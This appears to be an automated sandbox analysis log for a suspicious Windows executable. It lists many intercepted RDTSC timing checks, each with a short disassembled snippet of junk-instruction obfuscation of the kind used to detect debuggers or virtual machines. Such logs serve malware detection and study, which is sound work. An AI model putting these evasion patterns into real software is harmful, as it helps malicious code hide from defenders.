                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C92BB6 second address: C92C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 call 00007F0DD08F41C8h 0x0000000c jmp 00007F0DD08F41BEh 0x00000011 pop edi 0x00000012 call 00007F0DD08F41B9h 0x00000017 jne 00007F0DD08F41C0h 0x0000001d push eax 0x0000001e push esi 0x0000001f jmp 00007F0DD08F41C2h 0x00000024 pop esi 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 jno 00007F0DD08F41C4h 0x0000002f mov eax, dword ptr [eax] 0x00000031 push esi 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9306B second address: C930BD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0DD1497E6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F0DD1497E68h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000004h 0x00000029 jmp 00007F0DD1497E71h 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 jnp 00007F0DD1497E6Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C930BD second address: C930C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C930C1 second address: C930CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F0DD1497E66h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C935EE second address: C935F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C935F2 second address: C935FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C935FB second address: C93612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F0DD08F41BCh 0x00000011 jg 00007F0DD08F41B6h 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C93612 second address: C9362F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD1497E79h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD391B second address: CD391F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD3A4F second address: CD3A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0DD1497E66h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD3A59 second address: CD3A81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0DD08F41C7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e jl 00007F0DD08F41D0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD3FD2 second address: CD3FE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0DD1497E66h 0x00000009 js 00007F0DD1497E66h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD3FE3 second address: CD3FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007F0DD08F41B6h 0x0000000c jbe 00007F0DD08F41B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD783F second address: CD7844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD7844 second address: CD7850 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0DD08F41BEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD70C0 second address: CD70D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DD1497E6Dh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD9DC1 second address: CD9DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD9DC7 second address: CD9DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F0DD1497E79h 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD9AAE second address: CD9ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 js 00007F0DD08F41CFh 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0DD08F41C7h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDDAFC second address: CDDB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDD1E3 second address: CDD226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jg 00007F0DD08F41B6h 0x0000000c pop eax 0x0000000d jmp 00007F0DD08F41C6h 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop edx 0x00000018 push edi 0x00000019 jmp 00007F0DD08F41C5h 0x0000001e pop edi 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDD36A second address: CDD36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDD36E second address: CDD376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDD376 second address: CDD38E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F0DD1497E66h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jne 00007F0DD1497E66h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDD38E second address: CDD396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDD396 second address: CDD3B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F0DD1497E73h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDD51C second address: CDD541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F0DD08F41B6h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F0DD08F41C5h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDD824 second address: CDD82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDD82A second address: CDD82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CDD82E second address: CDD834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE101E second address: CE102D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0DD08F41B6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE119D second address: CE11A7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0DD1497E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE11A7 second address: CE11B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD08F41BDh 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE6EDC second address: CE6EF5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F0DD1497E66h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE6EF5 second address: CE6F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0DD08F41B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE6F01 second address: CE6F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE6F07 second address: CE6F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F0DD08F41C5h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0DD08F41BEh 0x00000017 jmp 00007F0DD08F41BAh 0x0000001c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE6F41 second address: CE6F5A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0DD1497E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DD1497E6Bh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE6F5A second address: CE6F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE71F0 second address: CE71FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE71FC second address: CE7200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE7200 second address: CE720E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0DD1497E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE7631 second address: CE7638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE7638 second address: CE7646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F0DD1497E66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE7646 second address: CE764C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE764C second address: CE7679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0DD1497E66h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F0DD1497E74h 0x00000017 ja 00007F0DD1497E66h 0x0000001d popad 0x0000001e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE7679 second address: CE76A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F0DD08F41C0h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0DD08F41C0h 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE7806 second address: CE780C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE780C second address: CE7812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE7812 second address: CE7816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE7816 second address: CE781A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CE781A second address: CE7826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CEF9AD second address: CEF9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CEF9B1 second address: CEF9BE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0DD1497E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CEF9BE second address: CEF9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CEFC8F second address: CEFC95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CEFF15 second address: CEFF1B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CEFF1B second address: CEFF3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CEFF3A second address: CEFF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CEFF40 second address: CEFF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CEFF47 second address: CEFF4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CEFF4D second address: CEFF51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CF084C second address: CF086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F0DD08F41BCh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CF086F second address: CF0875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CF0875 second address: CF0879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CF0879 second address: CF087D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CFA22E second address: CFA234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CFA234 second address: CFA23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0DD1497E66h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CFA815 second address: CFA829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DD08F41BFh 0x00000009 popad 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CFA942 second address: CFA948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CFA948 second address: CFA95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F0DD08F41B6h 0x0000000d jbe 00007F0DD08F41B6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CFAC23 second address: CFAC3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4963C second address: C4964A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0DD08F41B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4964A second address: C49654 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0DD1497E66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C49654 second address: C4968F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0DD08F41BCh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 popad 0x00000012 push edi 0x00000013 js 00007F0DD08F41D5h 0x00000019 jmp 00007F0DD08F41C9h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4968F second address: C49699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C49699 second address: C4969D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D04EF0 second address: D04EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D04EF6 second address: D04F0B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0DD08F41B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jnc 00007F0DD08F41B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D0508E second address: D050A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E73h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D05366 second address: D0536A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D0536A second address: D0536E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D05638 second address: D05676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0DD08F41B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jg 00007F0DD08F41DCh 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D05676 second address: D05682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0DD1497E66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D058EE second address: D058F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D0463A second address: D0463E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D0CE9D second address: D0CEA3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D0CEA3 second address: D0CEC2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0DD1497E72h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F0DD1497E6Ah 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F0DD1497E66h 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D0CEC2 second address: D0CED2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0DD08F41BEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D0D051 second address: D0D056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
